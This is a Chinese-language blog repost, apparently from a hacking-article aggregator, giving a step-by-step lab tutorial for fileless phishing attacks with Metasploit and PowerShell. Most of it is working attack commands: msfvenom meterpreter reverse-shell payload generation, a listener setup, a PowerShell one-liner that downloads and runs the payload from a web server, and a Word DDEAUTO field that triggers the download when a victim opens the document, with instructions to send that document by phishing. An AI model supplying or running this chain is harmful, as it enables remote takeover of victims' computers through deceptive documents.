记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

MSF&Powershell进行钓鱼攻击

2021-08-27 01:57

一、Powershell配合MSF无文件攻击


实验环境:

攻击机

kali

192.168.1.7

靶机

win 07

192.168.1.9

web服务器

win 10

192.168.1.6

本次实验的大致过程如下:

    MSF生成payload并放到靶机能够访问的服务器上,攻击者通过钓鱼等方式使靶机执行powershell代码,靶机反弹到msf监听的端口上建立会话,由此攻击者可以利用此会话完成攻击控制靶机。


实验步骤:

1. kali生成payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1

# 生成名为x.ps1的windows/x64/meterpreter/reverse_tcp的payload


2. msf 设置监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1121run# msf开始监听本机1121端口



将刚刚生成的payload放到公网服务器,确保靶机能够访问。


在靶机直接运行powershell脚本,实战需要其他方式运行此代码:

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps1')

# 代码中的地址为公网地址。通过word域代码执行powershell脚本调用web服务器poayload

下载到靶机内存中执行

当靶机成功执行以上命令之后,msf会收到会话如下图,此时已经成功建立会话,可控制靶机。实验成功;


二、Powershell配合word钓鱼


攻击机

kali

192.168.1.7

靶机

win 07

192.168.1.9

(安装有office2013)

web服务器

win 10

192.168.1.6

 原理:

新建word文档,调用快捷键:CTRL+F9,填写域代码:

{DDEAUTO C:\\windows\\system32\\cmd.exe "/k notepad.exe}

  然后保存word,再次打开时会执行代码弹出记事本程序。word可以通过域代码执行系统命令。本实验利用word域调用powershell代码从而建立会话,控制靶机。


本次实验的大致过程如下: 

  将MSF生成payload并放到公网(模拟)web服务器上,确保靶机能够访问。对靶机进行word钓鱼攻击。当靶机打开word文件,会下载powershell payload到本地并执行,从而建立会话进行无文件攻击。


实验步骤:

  1. kali生成ps脚本:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1122 -f psh-reflection >x.ps2

# 生成名为x.ps2的windows/x64/meterpreter/reverse_tcp的payload

    2. msf 设置监听

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1122run# msf开始监听本机1122端口

    3.将生成的payload放到公网服务器,确保靶机能够访问。

    4.在本地新建word文档设置域(快捷键:CTRL+F9),域内代码为:

DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps2') "

    5.通过钓鱼等方式将该word文档发送到靶机诱使靶机点击文档。成功建立会话,可控制靶机。实验成功

---》

强烈推荐:

    每日发布 红队攻防技术文章、蓝队防守技术文章、ctf安全赛事技术文章、安全运维基线文章、以及不定期的安全类书籍抽奖~

知识来源: https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247514721&idx=2&sn=e38183486b8b3ed5a1519a54a62a4219

阅读:18132 | 评论:0 | 标签:攻击 shell 钓鱼

想收藏或者和大家分享这篇好文章→复制链接地址

“MSF&Powershell进行钓鱼攻击”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

求赞助求支持💖

标签云